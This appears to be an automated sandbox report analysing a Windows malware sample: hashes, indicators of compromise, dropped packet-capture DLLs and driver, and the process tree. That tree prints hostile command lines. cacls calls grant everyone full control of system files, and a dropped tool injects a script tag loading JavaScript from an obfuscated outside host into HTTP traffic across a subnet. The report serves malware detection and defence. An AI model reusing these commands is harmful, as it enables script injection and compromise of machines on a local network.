a90eced820e7f3708f4a24cd02202fabc1b4723eccfd6f727e5743402c28aac6

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
06/07/2024, 06:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe
Size

177KB
MD5

279888c5a9ce6660f42520d09408400c
SHA1

0fa3296e0b092f398c0f14cbfb058858841ad21d
SHA256

a90eced820e7f3708f4a24cd02202fabc1b4723eccfd6f727e5743402c28aac6
SHA512

d610875e9d05d34db939b3ddb497f1fcdaa0acab2522d87abb5b301e19fec2717badc6b81e1fdd60e5739c6ea22fb24c3d3557810d455d59e51b8e6b14fb1704
SSDEEP

3072:A7nbJLu9Mot52HjqgMZE1wz1R5qKCV/Awd6KbiiaQ7JeurlcI1CurJtRMTTYth+a:QDot5g8p1fqKi/rdnaQ9NmI1Cu9tuEHz

Score

8^/10

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\drivers\npf.sys	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe

Deletes itself 1 IoCs

pid	Process
1484	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2544	360uaif.exe

Loads dropped DLL 5 IoCs

pid	Process
2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe
2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe
2544	360uaif.exe
2544	360uaif.exe
2544	360uaif.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\WanPacket.dll	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wpcap.dll	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\360uaif.exe	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Packet.dll	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2400 wrote to memory of 2896	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	28
PID 2400 wrote to memory of 2896	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	28
PID 2400 wrote to memory of 2896	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	28
PID 2400 wrote to memory of 2896	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	28
PID 2400 wrote to memory of 3020	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	30
PID 2400 wrote to memory of 3020	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	30
PID 2400 wrote to memory of 3020	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	30
PID 2400 wrote to memory of 3020	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	30
PID 2400 wrote to memory of 2720	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	32
PID 2400 wrote to memory of 2720	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	32
PID 2400 wrote to memory of 2720	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	32
PID 2400 wrote to memory of 2720	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	32
PID 2400 wrote to memory of 2576	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	34
PID 2400 wrote to memory of 2576	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	34
PID 2400 wrote to memory of 2576	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	34
PID 2400 wrote to memory of 2576	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	34
PID 2400 wrote to memory of 2732	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	36
PID 2400 wrote to memory of 2732	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	36
PID 2400 wrote to memory of 2732	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	36
PID 2400 wrote to memory of 2732	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	36
PID 2400 wrote to memory of 2544	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	38
PID 2400 wrote to memory of 2544	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	38
PID 2400 wrote to memory of 2544	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	38
PID 2400 wrote to memory of 2544	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	38
PID 2400 wrote to memory of 1484	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	40
PID 2400 wrote to memory of 1484	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	40
PID 2400 wrote to memory of 1484	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	40
PID 2400 wrote to memory of 1484	2400	279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe	40

C:\Users\Admin\AppData\Local\Temp\279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\279888c5a9ce6660f42520d09408400c_JaffaCakes118.exe"
1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2400
- C:\Windows\SysWOW64\cacls.exe
  "C:\Windows\system32\cacls.exe" C:\Windows\system32\drivers\npf.sys /e /p everyone:f
  2⤵
  PID:2896
- C:\Windows\SysWOW64\cacls.exe
  "C:\Windows\system32\cacls.exe" C:\Windows\system32\Packet.dll /e /p everyone:f
  2⤵
  PID:3020
- C:\Windows\SysWOW64\cacls.exe
  "C:\Windows\system32\cacls.exe" C:\Windows\system32\WanPacket.dll /e /p everyone:f
  2⤵
  PID:2720
- C:\Windows\SysWOW64\cacls.exe
  "C:\Windows\system32\cacls.exe" C:\Windows\system32\wpcap.dll /e /p everyone:f
  2⤵
  PID:2576
- C:\Windows\SysWOW64\cacls.exe
  "C:\Windows\system32\cacls.exe" C:\Windows\system32\npptools.dll /e /p everyone:f
  2⤵
  PID:2732
- C:\Windows\SysWOW64\360uaif.exe
  -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://d%70o.P%61ss%69ngG%61s.n%65t/tj.js></script>"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c 12.bat
  2⤵
  - Deletes itself
  PID:1484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\12.bat

Filesize
2KB

MD5
965624a84bd3e7f20291ee56486b5d64

SHA1
d864772c2b83d1fdb0f694733c7d397a5efa356f

SHA256
904955a2d05b5af5f32d41f9d6f644f65fc2175a8611dca69365992a0d69477e

SHA512
6ba59cb49f645ec23e37f8bc8d289934e9cffe355e94ac56dabb6d1992fbc071daf1185e9a4051b935dff02d934fe5b67c0b5e484dafdb865fdad3f870d3deaa

Download Submit
\Windows\SysWOW64\360uaif.exe

Filesize
8.0MB

MD5
7a2d76a6c0bafec2b03c5e05fdecd1f2

SHA1
670a45ccd8f257e18186192f240e25703adb42b5

SHA256
cf4bb1dc52fffbfcae24ca8db57a0c8e1b5f79bd7cdaf49e3e8012725749cee1

SHA512
b9203e50cca63eef35c75aacf07a72ac4df674adff72efdba69cd58684d94327ed7bb3c1f2dceb5bfc0f18b00186eb0ef5736512c873a406d4f8207577f15ffb

Download Submit
\Windows\SysWOW64\Packet.dll

Filesize
86KB

MD5
9062aeea8cbfc4f0780bbbefad7cebcb

SHA1
c4ad39ec51ad0e84fe58f62931d13cddfde3189e

SHA256
b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

SHA512
60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

Download Submit
\Windows\SysWOW64\WanPacket.dll

Filesize
66KB

MD5
fdd104a9fd3427a1df37041fa947a041

SHA1
cca1881a3c02033008f78cc39b712b637c7f3e13

SHA256
384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

SHA512
9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

Download Submit
\Windows\SysWOW64\wpcap.dll

Filesize
234KB

MD5
ce842d25e5b7e6ff21a86cad9195fbe8

SHA1
d762270be089a89266b012351b52c595e260b59b

SHA256
7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

SHA512
84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

Download Submit
memory/2400-15-0x00000000003C0000-0x00000000003CF000-memory.dmp

Filesize
60KB

Download
memory/2400-0-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/2400-16-0x00000000003C0000-0x00000000003CF000-memory.dmp

Filesize
60KB

Download
memory/2400-4-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/2400-1-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/2544-22-0x0000000000220000-0x0000000000235000-memory.dmp

Filesize
84KB

Download
memory/2544-25-0x0000000000030000-0x0000000000040000-memory.dmp

Filesize
64KB

Download
memory/2544-26-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/2544-17-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download